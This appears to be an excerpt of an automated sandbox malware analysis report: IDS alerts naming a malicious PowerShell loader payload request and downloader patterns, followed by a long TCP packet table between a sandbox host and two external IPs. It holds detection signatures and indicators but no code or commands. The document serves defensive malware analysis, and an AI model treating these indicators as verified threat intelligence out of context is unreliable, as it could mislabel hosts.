2025-01-08T13:55:19.139942+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:19.139942+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:19.139942+0100	2047905	ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)	1	192.168.2.4	49857	142.250.185.225	443	TCP
2025-01-08T13:55:20.354888+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49867	185.166.143.48	443	TCP
2025-01-08T13:55:31.884881+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49945	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49956	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49956	142.250.185.225	443	TCP
2025-01-08T13:55:33.019368+0100	2047905	ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)	1	192.168.2.4	49956	142.250.185.225	443	TCP
2025-01-08T13:55:34.179749+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49964	185.166.143.48	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 13:53:55.546463966 CET	49675	443	192.168.2.4	173.222.162.32
Jan 8, 2025 13:54:05.155603886 CET	49675	443	192.168.2.4	173.222.162.32
Jan 8, 2025 13:55:09.458080053 CET	49724	80	192.168.2.4	199.232.214.172
Jan 8, 2025 13:55:09.464967966 CET	80	49724	199.232.214.172	192.168.2.4
Jan 8, 2025 13:55:09.465444088 CET	49724	80	192.168.2.4	199.232.214.172
Jan 8, 2025 13:55:16.271538019 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:16.271586895 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:16.272138119 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:16.279706955 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:16.279727936 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.036113977 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.036190987 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.037077904 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.037430048 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.573728085 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.573757887 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.574455976 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.582220078 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.623339891 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.966607094 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.966731071 CET	443	49845	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.966782093 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.970871925 CET	49845	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.972924948 CET	49857	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.972954035 CET	443	49857	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:17.973200083 CET	49857	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.973408937 CET	49857	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:17.973423004 CET	443	49857	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:18.684145927 CET	443	49857	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:18.685715914 CET	49857	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:18.685729027 CET	443	49857	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:19.139955044 CET	443	49857	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:19.140109062 CET	443	49857	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:19.140202045 CET	49857	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:19.140799999 CET	49857	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:19.150019884 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:19.150074005 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:19.150804043 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:19.151094913 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:19.151109934 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:19.875535011 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:19.875679016 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.056670904 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.056696892 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.057003975 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.068361044 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.115324974 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.354918957 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.354943037 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.354955912 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.355010033 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.355031013 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.355045080 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.355077028 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.437427998 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.437452078 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.437505007 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.437510967 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.437541008 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.437557936 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.438153028 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.438213110 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.523705006 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.523731947 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.523791075 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.523802996 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.523840904 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.523852110 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.524859905 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.524874926 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.524930954 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.524936914 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.524974108 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.526640892 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.526658058 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.526710033 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.526715994 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.526741982 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.526755095 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.528278112 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.528291941 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.528378010 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.528383970 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.528517962 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.620337009 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.620362043 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.620421886 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.620457888 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.620471954 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.620500088 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.620963097 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.620979071 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.621030092 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.621036053 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.621067047 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.621083021 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.621480942 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.621499062 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.621557951 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.621563911 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.621597052 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.621615887 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.621990919 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.622008085 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.622088909 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.622095108 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.622140884 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.622839928 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.622854948 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.622899055 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.622905016 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.622942924 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.625791073 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.625808954 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.625864029 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.625870943 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.625901937 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.625921011 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.626698017 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.626713037 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.626758099 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.626764059 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.626791954 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.626811028 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.645498991 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.707110882 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.707129955 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.707195044 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.707212925 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.707438946 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709044933 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709059954 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709094048 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709100008 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709127903 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709137917 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709367990 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709383011 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709415913 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709420919 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709453106 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709482908 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709774017 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709788084 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709841967 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709846973 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709856033 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709873915 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709906101 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709911108 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.709928036 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.709953070 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.710437059 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.710449934 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.710499048 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.710503101 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.710522890 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.710541964 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.712694883 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.712707996 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.712779999 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.712784052 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.712795019 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.712846041 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.862381935 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.862406015 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.862463951 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.862487078 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.862497091 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.863434076 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864028931 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864064932 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864084005 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864090919 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864104986 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864140987 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864171028 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864192963 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864231110 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864236116 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864274979 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864321947 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864336967 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864378929 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864386082 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864474058 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864490032 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864504099 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864552975 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864557981 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864619017 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864641905 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864672899 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864680052 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864698887 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864721060 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864818096 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864831924 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864875078 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.864880085 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864954948 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.864973068 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.865025043 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.865030050 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.865062952 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.865091085 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.865134954 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.865155935 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.865190029 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.865195990 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.865210056 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.867445946 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883121967 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883147001 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883198023 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883234024 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883253098 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883296013 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883310080 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883337021 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883378983 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883387089 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883399963 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883441925 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883495092 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883511066 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883547068 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883553982 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883579969 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883594990 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883603096 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883620024 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883620024 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883626938 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883656025 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883682966 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883781910 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883797884 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883850098 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883855104 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.883869886 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.883898020 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.884205103 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.884218931 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.884283066 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.884289980 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.884737968 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.884756088 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.884813070 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.884820938 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.885685921 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.895077944 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.895095110 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.895159960 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.895169020 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.895440102 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.903661966 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.967751980 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.967775106 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.967827082 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.967840910 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.967869043 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.967880011 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.969278097 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.969293118 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.969336033 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.969343901 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.969371080 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.969384909 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.969783068 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.969799042 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.969835043 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.969841957 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.969873905 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.969892025 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970293999 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970309973 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970347881 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970354080 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970381021 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970402002 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970606089 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970628023 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970669031 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970675945 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970699072 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970726967 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970881939 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970896959 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970932961 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970938921 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.970963955 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.970984936 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.971605062 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.971621990 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.971671104 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.971678019 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.971719980 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.982331038 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.982347965 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.982402086 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.982409954 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:20.982443094 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:20.982455015 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.054563999 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.054585934 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.054627895 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.054636955 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.054668903 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.054680109 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.056030035 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.056047916 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.056094885 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.056103945 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.056153059 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.056514025 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.056529999 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.056562901 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.056570053 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.056601048 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.056612015 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:21.057040930 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.057055950 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:21.057101011 CET	49867	443	192.168.2.4	185.166.143.48
